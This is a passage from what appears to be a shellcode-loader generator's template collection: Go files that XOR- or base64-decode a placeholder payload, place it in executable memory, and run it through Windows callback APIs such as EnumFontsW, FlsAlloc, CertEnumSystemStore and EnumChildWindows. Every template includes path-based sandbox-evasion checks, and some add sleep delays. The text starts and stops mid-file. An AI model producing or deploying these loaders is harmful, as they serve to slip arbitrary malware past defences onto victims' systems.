User32 = syscall.NewLazyDLL("User32.dll") 26 | Gdi32 = syscall.NewLazyDLL("Gdi32.dll") 27 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 28 | GetDC = User32.NewProc("GetDC") 29 | EnumFontsW = Gdi32.NewProc("EnumFontsW") 30 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 31 | ) 32 | 33 | func Callback(shellcode []byte) { 34 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 35 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 36 | dc, _, _ := GetDC.Call(NULL) 37 | EnumFontsW.Call(dc, NULL, addr, NULL) 38 | } 39 | 40 | func XorDecrypt(plaintext []byte, key []byte) []byte { 41 | ciphertext := make([]byte, len(plaintext)) 42 | keyLength := len(key) 43 | for i, byte := range plaintext { 44 | keyByte := key[i%keyLength] 45 | encryptedByte := byte ^ keyByte 46 | ciphertext[i] = encryptedByte 47 | } 48 | return ciphertext 49 | } 50 | 51 | func DecryptData(v2 string) []byte { 52 | key := []byte{{{Key}}} 53 | v22, _ := base64.StdEncoding.DecodeString(v2) 54 | v222 := XorDecrypt(v22, key) 55 | return v222 56 | } 57 | 58 | func main() { 59 | args := os.Args[0] 60 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 61 | os.Exit(0) 62 | } 63 | 64 | ciphertext := "{{Shellcode}}" 65 | byteData := DecryptData(ciphertext) 66 | Callback(byteData) 67 | } 68 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/xor/LOCAL/go_VirtualAlloc.go: -------------------------------------------------------------------------------- 1 | 2 | package main 3 | 4 | import( 5 | "golang.org/x/sys/windows" 6 | "time" 7 | "unsafe" 8 | "math/rand" 9 | "os" 10 | "io/ioutil" 11 | 12 | "syscall" 13 | ) 14 | 15 | func XorDecrypt(plaintext []byte, key []byte) []byte { 16 | ciphertext := make([]byte, len(plaintext)) 17 | keyLength := len(key) 18 | for i, byte := range plaintext { 19 | keyByte := key[i % keyLength] 20 | encryptedByte := byte ^ 
keyByte 21 | ciphertext[i] = encryptedByte 22 | } 23 | return ciphertext 24 | } 25 | 26 | func DecryptData(v2 []byte) []byte { 27 | key := []byte{{{Key}}} 28 | v222 := XorDecrypt(v2, key) 29 | return v222 30 | } 31 | 32 | func WriteMemory(inbuf []byte, destination uintptr) { 33 | for index := uint32(0); index < uint32(len(inbuf)); index++ { 34 | writePtr := unsafe.Pointer(destination + uintptr(index)) 35 | v := (*byte)(writePtr) 36 | *v = inbuf[index] 37 | } 38 | } 39 | 40 | func Ldr1(calc []byte) { 41 | 42 | mKernel32, _ := syscall.LoadDLL("kernel32.dll") 43 | fVirtualAlloc, _ := mKernel32.FindProc("VirtualAlloc") 44 | calc_len := uintptr(len(calc)) 45 | Ptr1, _, _ := fVirtualAlloc.Call(uintptr(0), calc_len, windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE) 46 | WriteMemory(calc, Ptr1) 47 | syscall.SyscallN(Ptr1, 0, 0, 0, 0) 48 | } 49 | 50 | 51 | func Sleeeep() { 52 | res := 1 53 | for i := 0; i < 5; i++ { 54 | number := rand.Intn(900) + 100 55 | res *= number 56 | } 57 | time.Sleep(10 * time.Second) 58 | } 59 | 60 | 61 | 62 | func main() { 63 | 64 | args := os.Args[0] 65 | if (args[10] == 92 && (args[0] == 99 || args[0] == 67)) { 66 | os.Exit(0) 67 | } 68 | 69 | Sleeeep() 70 | 71 | content, err := ioutil.ReadFile("{{LOCAL_FILENAME}}") 72 | if err != nil { 73 | return 74 | } 75 | 76 | byteData := DecryptData(content) 77 | 78 | Ldr1(byteData) 79 | 80 | } -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/xor/EMBEDDED/go_FlsAlloc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | if1 [0]byte 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | NULL = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 22 | ntdll = syscall.NewLazyDLL("ntdll.dll") 23 | VirtualAlloc = 
kernel32.NewProc("VirtualAlloc") 24 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 25 | FlsAlloc = kernel32.NewProc("FlsAlloc") 26 | FlsSetValue = kernel32.NewProc("FlsSetValue") 27 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 28 | ) 29 | 30 | func Callback(shellcode []byte) { 31 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 32 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 33 | dIndex, _, _ := FlsAlloc.Call(addr) 34 | dummy, _ := syscall.UTF16PtrFromString("dummy") 35 | FlsSetValue.Call(dIndex, (uintptr)(unsafe.Pointer(dummy))) 36 | } 37 | 38 | func XorDecrypt(plaintext []byte, key []byte) []byte { 39 | ciphertext := make([]byte, len(plaintext)) 40 | keyLength := len(key) 41 | for i, byte := range plaintext { 42 | keyByte := key[i%keyLength] 43 | encryptedByte := byte ^ keyByte 44 | ciphertext[i] = encryptedByte 45 | } 46 | return ciphertext 47 | } 48 | 49 | func DecryptData(shellcode []byte) []byte { 50 | key := []byte{{{Key}}} 51 | decryptShellcode := XorDecrypt(shellcode, key) 52 | return decryptShellcode 53 | } 54 | 55 | func main() { 56 | args := os.Args[0] 57 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 58 | os.Exit(0) 59 | } 60 | 61 | ciphertext := []byte{{{Shellcode}}} 62 | byteData := DecryptData(ciphertext) 63 | Callback(byteData) 64 | } 65 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/xor/LOCAL/go_EnumFontsW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | timer int 11 | dummy [522]byte 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | NULL = 0 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 23 | ntdll = 
syscall.NewLazyDLL("ntdll.dll") 24 | User32 = syscall.NewLazyDLL("User32.dll") 25 | Gdi32 = syscall.NewLazyDLL("Gdi32.dll") 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | GetDC = User32.NewProc("GetDC") 28 | EnumFontsW = Gdi32.NewProc("EnumFontsW") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | dc, _, _ := GetDC.Call(NULL) 36 | EnumFontsW.Call(dc, NULL, addr, NULL) 37 | } 38 | 39 | func XorDecrypt(plaintext []byte, key []byte) []byte { 40 | ciphertext := make([]byte, len(plaintext)) 41 | keyLength := len(key) 42 | for i, byte := range plaintext { 43 | keyByte := key[i%keyLength] 44 | encryptedByte := byte ^ keyByte 45 | ciphertext[i] = encryptedByte 46 | } 47 | return ciphertext 48 | } 49 | 50 | func DecryptData(shellcode []byte) []byte { 51 | key := []byte{{{Key}}} 52 | decryptShellcode := XorDecrypt(shellcode, key) 53 | return decryptShellcode 54 | } 55 | 56 | func main() { 57 | args := os.Args[0] 58 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 59 | os.Exit(0) 60 | } 61 | 62 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 63 | if err != nil { 64 | return 65 | } 66 | byteData := DecryptData(ciphertext) 67 | Callback(byteData) 68 | } 69 | -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/base64Xor/EMBEDDED/go_CertEnumSystemStore.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | 9 | "golang.org/x/sys/windows" 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = 
syscall.NewLazyDLL("kernel32.dll") 20 | ntdll = syscall.NewLazyDLL("ntdll.dll") 21 | Crypt32 = syscall.NewLazyDLL("Crypt32.dll") 22 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 23 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 24 | CertEnumSystemStore = Crypt32.NewProc("CertEnumSystemStore") 25 | ) 26 | 27 | func Callback(shellcode []byte) { 28 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 29 | if err != nil && err.Error() != "The operation completed successfully." { 30 | syscall.Exit(0) 31 | } 32 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 33 | CertEnumSystemStore.Call(windows.CERT_SYSTEM_STORE_CURRENT_USER, 0, 0, addr) 34 | 35 | } 36 | 37 | func XorDecrypt(plaintext []byte, key []byte) []byte { 38 | ciphertext := make([]byte, len(plaintext)) 39 | keyLength := len(key) 40 | for i, byte := range plaintext { 41 | keyByte := key[i%keyLength] 42 | encryptedByte := byte ^ keyByte 43 | ciphertext[i] = encryptedByte 44 | } 45 | return ciphertext 46 | } 47 | 48 | func DecryptData(v2 string) []byte { 49 | key := []byte{{{Key}}} 50 | v22, _ := base64.StdEncoding.DecodeString(v2) 51 | v222 := XorDecrypt(v22, key) 52 | return v222 53 | } 54 | 55 | func main() { 56 | args := os.Args[0] 57 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 58 | os.Exit(0) 59 | } 60 | 61 | ciphertext := "{{Shellcode}}" 62 | byteData := DecryptData(ciphertext) 63 | Callback(byteData) 64 | } 65 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/xor/EMBEDDED/go_EnumChildWindows.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | timer int 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | CAL_SMONTHNAME1 = 0x00000015 
18 | ENUM_ALL_CALENDARS = 0xffffffff 19 | SORT_DEFAULT = 0x0 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 24 | ntdll = syscall.NewLazyDLL("ntdll.dll") 25 | User32 = syscall.NewLazyDLL("User32.dll") 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | EnumChildWindows = User32.NewProc("EnumChildWindows") 28 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 29 | ) 30 | 31 | func Callback(shellcode []byte) { 32 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | if err != nil && err.Error() != "The operation completed successfully." { 34 | syscall.Exit(0) 35 | } 36 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 37 | EnumChildWindows.Call(0, addr, 0) 38 | } 39 | 40 | func XorDecrypt(plaintext []byte, key []byte) []byte { 41 | ciphertext := make([]byte, len(plaintext)) 42 | keyLength := len(key) 43 | for i, byte := range plaintext { 44 | keyByte := key[i%keyLength] 45 | encryptedByte := byte ^ keyByte 46 | ciphertext[i] = encryptedByte 47 | } 48 | return ciphertext 49 | } 50 | 51 | func DecryptData(shellcode []byte) []byte { 52 | key := []byte{{{Key}}} 53 | decryptShellcode := XorDecrypt(shellcode, key) 54 | return decryptShellcode 55 | } 56 | 57 | func main() { 58 | args := os.Args[0] 59 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 60 | os.Exit(0) 61 | } 62 | 63 | ciphertext := []byte{{{Shellcode}}} 64 | byteData := DecryptData(ciphertext) 65 | Callback(byteData) 66 | } 67 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/base64Xor/EMBEDDED/go_FlsAlloc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | if1 [0]byte 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | 
PAGE_EXECUTE_READWRITE = 0x40 18 | NULL = 0 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 23 | ntdll = syscall.NewLazyDLL("ntdll.dll") 24 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 25 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 26 | FlsAlloc = kernel32.NewProc("FlsAlloc") 27 | FlsSetValue = kernel32.NewProc("FlsSetValue") 28 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 29 | ) 30 | 31 | func Callback(shellcode []byte) { 32 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 34 | dIndex, _, _ := FlsAlloc.Call(addr) 35 | dummy, _ := syscall.UTF16PtrFromString("dummy") 36 | FlsSetValue.Call(dIndex, (uintptr)(unsafe.Pointer(dummy))) 37 | } 38 | 39 | func XorDecrypt(plaintext []byte, key []byte) []byte { 40 | ciphertext := make([]byte, len(plaintext)) 41 | keyLength := len(key) 42 | for i, byte := range plaintext { 43 | keyByte := key[i%keyLength] 44 | encryptedByte := byte ^ keyByte 45 | ciphertext[i] = encryptedByte 46 | } 47 | return ciphertext 48 | } 49 | 50 | func DecryptData(v2 string) []byte { 51 | key := []byte{{{Key}}} 52 | v22, _ := base64.StdEncoding.DecodeString(v2) 53 | v222 := XorDecrypt(v22, key) 54 | return v222 55 | } 56 | 57 | func main() { 58 | args := os.Args[0] 59 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 60 | os.Exit(0) 61 | } 62 | 63 | ciphertext := "{{Shellcode}}" 64 | byteData := DecryptData(ciphertext) 65 | Callback(byteData) 66 | } 67 | -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/xor/LOCAL/go_CertEnumSystemStore.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | 8 | "golang.org/x/sys/windows" 9 | ) 10 | 11 | const ( 12 | MEM_COMMIT = 0x1000 13 | 
MEM_RESERVE = 0x2000 14 | PAGE_EXECUTE_READWRITE = 0x40 15 | ) 16 | 17 | var ( 18 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 19 | ntdll = syscall.NewLazyDLL("ntdll.dll") 20 | Crypt32 = syscall.NewLazyDLL("Crypt32.dll") 21 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 22 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 23 | CertEnumSystemStore = Crypt32.NewProc("CertEnumSystemStore") 24 | ) 25 | 26 | func Callback(shellcode []byte) { 27 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 28 | if err != nil && err.Error() != "The operation completed successfully." { 29 | syscall.Exit(0) 30 | } 31 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 32 | CertEnumSystemStore.Call(windows.CERT_SYSTEM_STORE_CURRENT_USER, 0, 0, addr) 33 | 34 | } 35 | 36 | func XorDecrypt(plaintext []byte, key []byte) []byte { 37 | ciphertext := make([]byte, len(plaintext)) 38 | keyLength := len(key) 39 | for i, byte := range plaintext { 40 | keyByte := key[i%keyLength] 41 | encryptedByte := byte ^ keyByte 42 | ciphertext[i] = encryptedByte 43 | } 44 | return ciphertext 45 | } 46 | 47 | func DecryptData(shellcode []byte) []byte { 48 | key := []byte{{{Key}}} 49 | decryptShellcode := XorDecrypt(shellcode, key) 50 | return decryptShellcode 51 | } 52 | 53 | func main() { 54 | args := os.Args[0] 55 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 56 | os.Exit(0) 57 | } 58 | 59 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 60 | if err != nil { 61 | return 62 | } 63 | byteData := DecryptData(ciphertext) 64 | Callback(byteData) 65 | } 66 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/xor/LOCAL/go_FlsAlloc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | if1 [0]byte 11 | ) 12 | 13 | 
const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | NULL = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 22 | ntdll = syscall.NewLazyDLL("ntdll.dll") 23 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 24 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 25 | FlsAlloc = kernel32.NewProc("FlsAlloc") 26 | FlsSetValue = kernel32.NewProc("FlsSetValue") 27 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 28 | ) 29 | 30 | func Callback(shellcode []byte) { 31 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 32 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 33 | dIndex, _, _ := FlsAlloc.Call(addr) 34 | dummy, _ := syscall.UTF16PtrFromString("dummy") 35 | FlsSetValue.Call(dIndex, (uintptr)(unsafe.Pointer(dummy))) 36 | } 37 | 38 | func XorDecrypt(plaintext []byte, key []byte) []byte { 39 | ciphertext := make([]byte, len(plaintext)) 40 | keyLength := len(key) 41 | for i, byte := range plaintext { 42 | keyByte := key[i%keyLength] 43 | encryptedByte := byte ^ keyByte 44 | ciphertext[i] = encryptedByte 45 | } 46 | return ciphertext 47 | } 48 | 49 | func DecryptData(shellcode []byte) []byte { 50 | key := []byte{{{Key}}} 51 | decryptShellcode := XorDecrypt(shellcode, key) 52 | return decryptShellcode 53 | } 54 | 55 | func main() { 56 | args := os.Args[0] 57 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 58 | os.Exit(0) 59 | } 60 | 61 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 62 | if err != nil { 63 | return 64 | } 65 | byteData := DecryptData(ciphertext) 66 | Callback(byteData) 67 | } 68 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/base64Xor/EMBEDDED/go_EnumChildWindows.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | 
"encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | timer int 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | CAL_SMONTHNAME1 = 0x00000015 19 | ENUM_ALL_CALENDARS = 0xffffffff 20 | SORT_DEFAULT = 0x0 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 25 | ntdll = syscall.NewLazyDLL("ntdll.dll") 26 | User32 = syscall.NewLazyDLL("User32.dll") 27 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 28 | EnumChildWindows = User32.NewProc("EnumChildWindows") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | if err != nil && err.Error() != "The operation completed successfully." { 35 | syscall.Exit(0) 36 | } 37 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 38 | EnumChildWindows.Call(0, addr, 0) 39 | } 40 | 41 | func XorDecrypt(plaintext []byte, key []byte) []byte { 42 | ciphertext := make([]byte, len(plaintext)) 43 | keyLength := len(key) 44 | for i, byte := range plaintext { 45 | keyByte := key[i%keyLength] 46 | encryptedByte := byte ^ keyByte 47 | ciphertext[i] = encryptedByte 48 | } 49 | return ciphertext 50 | } 51 | 52 | func DecryptData(v2 string) []byte { 53 | key := []byte{{{Key}}} 54 | v22, _ := base64.StdEncoding.DecodeString(v2) 55 | v222 := XorDecrypt(v22, key) 56 | return v222 57 | } 58 | 59 | func main() { 60 | args := os.Args[0] 61 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 62 | os.Exit(0) 63 | } 64 | 65 | ciphertext := "{{Shellcode}}" 66 | byteData := DecryptData(ciphertext) 67 | Callback(byteData) 68 | } 69 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/base64Xor/LOCAL/go_EnumFontsW.go: 
-------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | timer int 12 | dummy [522]byte 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READWRITE = 0x40 19 | NULL = 0 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 24 | ntdll = syscall.NewLazyDLL("ntdll.dll") 25 | User32 = syscall.NewLazyDLL("User32.dll") 26 | Gdi32 = syscall.NewLazyDLL("Gdi32.dll") 27 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 28 | GetDC = User32.NewProc("GetDC") 29 | EnumFontsW = Gdi32.NewProc("EnumFontsW") 30 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 31 | ) 32 | 33 | func Callback(shellcode []byte) { 34 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 35 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 36 | dc, _, _ := GetDC.Call(NULL) 37 | EnumFontsW.Call(dc, NULL, addr, NULL) 38 | } 39 | 40 | func XorDecrypt(plaintext []byte, key []byte) []byte { 41 | ciphertext := make([]byte, len(plaintext)) 42 | keyLength := len(key) 43 | for i, byte := range plaintext { 44 | keyByte := key[i%keyLength] 45 | encryptedByte := byte ^ keyByte 46 | ciphertext[i] = encryptedByte 47 | } 48 | return ciphertext 49 | } 50 | 51 | func DecryptData(v2 string) []byte { 52 | key := []byte{{{Key}}} 53 | v22, _ := base64.StdEncoding.DecodeString(v2) 54 | v222 := XorDecrypt(v22, key) 55 | return v222 56 | } 57 | 58 | func main() { 59 | args := os.Args[0] 60 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 61 | os.Exit(0) 62 | } 63 | 64 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 65 | if err != nil { 66 | return 67 | } 68 | byteData := DecryptData(string(ciphertext)) 69 | Callback(byteData) 70 | } 71 | 
-------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/xor/LOCAL/go_EnumChildWindows.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | timer int 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | CAL_SMONTHNAME1 = 0x00000015 18 | ENUM_ALL_CALENDARS = 0xffffffff 19 | SORT_DEFAULT = 0x0 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 24 | ntdll = syscall.NewLazyDLL("ntdll.dll") 25 | User32 = syscall.NewLazyDLL("User32.dll") 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | EnumChildWindows = User32.NewProc("EnumChildWindows") 28 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 29 | ) 30 | 31 | func Callback(shellcode []byte) { 32 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | if err != nil && err.Error() != "The operation completed successfully." 
{ 34 | syscall.Exit(0) 35 | } 36 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 37 | EnumChildWindows.Call(0, addr, 0) 38 | } 39 | 40 | func XorDecrypt(plaintext []byte, key []byte) []byte { 41 | ciphertext := make([]byte, len(plaintext)) 42 | keyLength := len(key) 43 | for i, byte := range plaintext { 44 | keyByte := key[i%keyLength] 45 | encryptedByte := byte ^ keyByte 46 | ciphertext[i] = encryptedByte 47 | } 48 | return ciphertext 49 | } 50 | 51 | func DecryptData(shellcode []byte) []byte { 52 | key := []byte{{{Key}}} 53 | decryptShellcode := XorDecrypt(shellcode, key) 54 | return decryptShellcode 55 | } 56 | 57 | func main() { 58 | args := os.Args[0] 59 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 60 | os.Exit(0) 61 | } 62 | 63 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 64 | if err != nil { 65 | return 66 | } 67 | byteData := DecryptData(ciphertext) 68 | Callback(byteData) 69 | } 70 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/base64Xor/LOCAL/go_VirtualAlloc.go: -------------------------------------------------------------------------------- 1 | 2 | package main 3 | 4 | import( 5 | "encoding/base64" 6 | "golang.org/x/sys/windows" 7 | "time" 8 | "unsafe" 9 | "math/rand" 10 | "os" 11 | "io/ioutil" 12 | 13 | "syscall" 14 | ) 15 | 16 | func XorDecrypt(plaintext []byte, key []byte) []byte { 17 | ciphertext := make([]byte, len(plaintext)) 18 | keyLength := len(key) 19 | for i, byte := range plaintext { 20 | keyByte := key[i % keyLength] 21 | encryptedByte := byte ^ keyByte 22 | ciphertext[i] = encryptedByte 23 | } 24 | return ciphertext 25 | } 26 | 27 | func DecryptData(v2 string) []byte { 28 | key := []byte{{{Key}}} 29 | v22, _ := base64.StdEncoding.DecodeString(v2) 30 | v222 := XorDecrypt(v22, key) 31 | return v222 32 | } 33 | 34 | func WriteMemory(inbuf []byte, destination uintptr) { 35 | for index := uint32(0); index < 
uint32(len(inbuf)); index++ { 36 | writePtr := unsafe.Pointer(destination + uintptr(index)) 37 | v := (*byte)(writePtr) 38 | *v = inbuf[index] 39 | } 40 | } 41 | 42 | func Ldr1(calc []byte) { 43 | 44 | mKernel32, _ := syscall.LoadDLL("kernel32.dll") 45 | fVirtualAlloc, _ := mKernel32.FindProc("VirtualAlloc") 46 | calc_len := uintptr(len(calc)) 47 | Ptr1, _, _ := fVirtualAlloc.Call(uintptr(0), calc_len, windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE) 48 | WriteMemory(calc, Ptr1) 49 | syscall.SyscallN(Ptr1, 0, 0, 0, 0) 50 | } 51 | 52 | 53 | func Sleeeep() { 54 | res := 1 55 | for i := 0; i < 5; i++ { 56 | number := rand.Intn(900) + 100 57 | res *= number 58 | } 59 | time.Sleep(10 * time.Second) 60 | } 61 | 62 | 63 | 64 | func main() { 65 | 66 | args := os.Args[0] 67 | if (args[10] == 92 && (args[0] == 99 || args[0] == 67)) { 68 | os.Exit(0) 69 | } 70 | 71 | Sleeeep() 72 | 73 | content, err := ioutil.ReadFile("{{LOCAL_FILENAME}}") 74 | if err != nil { 75 | return 76 | } 77 | 78 | byteData := DecryptData(string(content)) 79 | 80 | Ldr1(byteData) 81 | 82 | } -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/base64Xor/LOCAL/go_CertEnumSystemStore.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | 9 | "golang.org/x/sys/windows" 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 20 | ntdll = syscall.NewLazyDLL("ntdll.dll") 21 | Crypt32 = syscall.NewLazyDLL("Crypt32.dll") 22 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 23 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 24 | 